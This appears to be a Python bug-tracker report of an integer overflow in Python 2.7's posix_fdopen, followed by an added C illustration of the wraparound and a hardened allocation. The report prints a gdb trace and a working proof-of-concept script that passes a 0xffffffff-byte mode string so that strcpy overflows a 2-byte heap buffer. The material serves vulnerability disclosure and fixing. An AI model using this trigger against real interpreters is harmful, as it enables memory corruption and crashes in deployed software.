
Author madness
Recipients madness
Date 2016-06-05.18:01:37
Message-id <1465149697.95.0.775433257828.issue27235@psf.upfronthosting.co.za>
Content
I have tested this vulnerability on Python 2.7 and it is absolutely affected :). The integer overflow occurs in the posix_fdopen function. If an attacker sends an fdopen mode value longer than the maximum integer value (2^32) to fdopen, an integer overflow occurs.

    /* Excerpt of posix_fdopen() as quoted in the report; "..." marks lines omitted in the original. */
    int fd;
    char *orgmode = "r";
    int bufsize = -1;
    FILE *fp;
    PyObject *f;
    char *mode;
    if (!PyArg_ParseTuple(args, "i|si", &fd, &orgmode, &bufsize))
        return NULL;

    /* Sanitize mode.  See fileobject.c */
    mode = PyMem_MALLOC(strlen(orgmode)+3);   /* the strlen()+3 arithmetic discussed below */
    ...
    strcpy(mode, orgmode);                    /* unbounded copy into the buffer sized above */

 os.fdopen(fd[, mode[, bufsize]])

fo = os.fdopen(fd, "r"*0xffffffff)

   0x5e2595 <+86>:	mov    edi,eax
=> 0x5e2598 <+89>:	call   0x416e50 <strlen@plt>     
(gdb) print /x $eax
$1 = 0xffffffff
After the "add" instruction performs the addition, the overflow occurs:
=> 0x5e259d <+94>:	add    eax,0x3
(gdb) print /x $eax
$5 = 0x2
Then memory is allocated, and afterwards the buffer is copied ==>
   0x5e25a1 <+98>:	mov    edi,eax
   0x5e25a4 <+101>:	call   0x48f793 <_PyMem_DebugMalloc>
   0x5e25cb <+140>:	mov    esi,edx
   ...
   0x5e25ce <+143>:	mov    edi,eax
   0x5e25d1 <+146>:	call   0x416b80 <strcpy@plt>

Buffer copy:
strcpy(mode, orgmode); <=== overflow


poc:
#!/usr/bin/python
# Python 2.7 PoC: pass a mode string of length 0xffffffff so that
# strlen(orgmode)+3 wraps when computed in 32 bits, as described above.

import os

fd = os.open("foo.txt", os.O_RDWR | os.O_CREAT)
# mode length 0xffffffff, matching the strlen() result shown in gdb above
fo = os.fdopen(fd, "r" * 0xffffffff)
print "Closed the file successfully!!"
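The arithmetic the report describes, and a checked alternative, as an added example (this is not CPython code and not part of the original report). wrapped_mode_alloc_size() reproduces the 32-bit truncation of the strlen() result followed by the +3 that the gdb session shows; safe_mode_alloc_size() and copy_mode_checked() are hypothetical hardened replacements that compute the size in size_t, reject mode strings longer than any legitimate fopen() mode (MAX_MODE_LEN is an assumed limit chosen for this example), and use a bounded copy instead of strcpy().

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Mirrors the arithmetic the report shows in eax: the strlen() result is
 * truncated to 32 bits and then 3 is added. Unsigned wraparound is defined
 * in C, so this reproduces 0xffffffff + 3 == 2 without undefined behaviour.
 */
unsigned int wrapped_mode_alloc_size(size_t mode_len)
{
    unsigned int n = (unsigned int)mode_len;
    return n + 3u;
}

/*
 * Hardened version (added here, not CPython code): check that the addition
 * cannot wrap in size_t, then reject mode strings longer than any legitimate
 * fopen() mode. MAX_MODE_LEN is an assumed limit for this example.
 * Returns 0 on success and -1 if the length is rejected.
 */
#define MAX_MODE_LEN 8

int safe_mode_alloc_size(size_t mode_len, size_t *out)
{
    if (mode_len > SIZE_MAX - 3)      /* general overflow guard for len + 3 */
        return -1;
    if (mode_len > MAX_MODE_LEN)      /* no real fopen() mode is this long */
        return -1;
    *out = mode_len + 3;
    return 0;
}

/*
 * Allocate and copy a mode string using the checked size. The +3 leaves
 * room for the NUL plus two bytes that later sanitizing may append.
 * Returns NULL if the mode is rejected or malloc fails; the caller frees.
 */
char *copy_mode_checked(const char *orgmode)
{
    size_t len = strlen(orgmode);
    size_t need;
    if (safe_mode_alloc_size(len, &need) != 0)
        return NULL;
    char *mode = malloc(need);
    if (mode == NULL)
        return NULL;
    memcpy(mode, orgmode, len + 1);  /* bounded copy, includes the NUL */
    return mode;
}

int main(void)
{
    size_t need;
    printf("wrapped: strlen 0xffffffff + 3 -> %u\n",
           wrapped_mode_alloc_size((size_t)0xffffffffUL));
    printf("safe:    \"r\" -> %s\n",
           safe_mode_alloc_size(1, &need) == 0 ? "accepted" : "rejected");
    printf("safe:    len 0xffffffff -> %s\n",
           safe_mode_alloc_size((size_t)0xffffffffUL, &need) == 0
               ? "accepted" : "rejected");
    char *m = copy_mode_checked("rb");
    printf("copy:    %s\n", m ? m : "(rejected)");
    free(m);
    return 0;
}
```

The wrapped computation returns 2 for a 0xffffffff-byte mode, which is the buffer size the report observes before strcpy(); the checked path never reaches malloc() for such an input.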